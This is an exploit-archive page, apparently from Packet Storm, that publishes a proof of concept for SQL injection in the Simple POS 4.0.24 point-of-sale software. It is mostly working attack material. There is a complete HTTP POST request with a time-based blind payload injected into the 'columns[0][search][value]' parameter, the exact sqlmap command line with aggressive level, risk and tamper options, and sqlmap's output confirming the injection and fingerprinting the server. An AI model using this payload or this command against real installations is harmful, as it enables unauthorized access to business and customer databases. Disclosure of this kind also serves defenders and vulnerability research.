what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Simple POS 4.0.24 SQL Injection

Simple POS 4.0.24 SQL Injection
Posted Sep 4, 2018
Authored by Renos Nikolaou

Simple POS version 4.0.24 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | e9253c28f9bbf2b4de3277cdbdeaa691830dc2f5f1cc22ac59d409ee078f6129

Simple POS 4.0.24 SQL Injection

Change Mirror Download
# Exploit Title: Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection
# Google Dork: N/A
# Date: 2018-08-31
# Exploit Author: Renos Nikolaou
# Software Link: https://codecanyon.net/item/simple-pos-point-of-sale-made-easy/3947976
# Vendor Homepage: https://tecdiary.com/
# Version: 4.0.24
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject sql commands on 'columns[0][search][value]' parameters in the management panel.

# PoC:

http://domain.com/spos/products

POST /spos/products/get_products/1 HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/spos/products
Content-Length: 2085
Cookie: spos_spos_cookie=ab62f546025dd1a7d652ba75d13b87dc; spos_session=049soe8cr49aq318q7qhqlic6kpdgdee
Connection: close

draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc


# SQLMap Result:
# SQLmap command: ./sqlmap.py -r spos.txt --dbms=mysql -v4 -p 'columns[0][search][value]' --banner --level 5 --risk 3 --tamper=space2comment --random-agent

Parameter: columns[0][search][value] (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: draw=2&columns[0][data]=pid&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=') AND (SELECT * FROM (SELECT(SLEEP(15)))EcJf) AND ('tzYh'='tzYh&columns[0][search][regex]=false&columns[1][data]=image&columns[1][name]=&columns[1][searchable]=false&columns[1][orderable]=false&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=code&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=pname&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=type&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=cname&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=quantity&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=true&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=tax&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=true&columns[7][search][value]=&columns[7][search][regex]=false&columns[8][data]=tax_method&columns[8][name]=&columns[8][searchable]=true&columns[8][orderable]=true&columns[8][search][value]=&columns[8][search][regex]=false&columns[9][data]=cost&columns[9][name]=&columns[9][searchable]=false&columns[9][orderable]=true&columns[9][search][value]=&columns[9][search][regex]=false&columns[10][data]=price&columns[10][name]=&columns[10][searchable]=false&columns[10][orderable]=true&columns[10][search][value]=&columns[10][search][regex]=false&columns[11][data]=Actions&columns[11][name]=&columns[11][searchable]=false&columns[11][orderable]=false&columns[11][search][value]=&columns[11][search][regex]=false&order[0][column]=0&order[0][dir]=desc&start=0&length=-1&search[value]=&search[regex]=false&spos_token=ab62f546025dd1a7d652ba75d13b87dc

Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web server operating system: Windows
web application technology: PHP 7.1.16, Apache 2.4.33
back-end DBMS: MySQL >= 5.0.12
banner: '10.1.31-MariaDB'

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close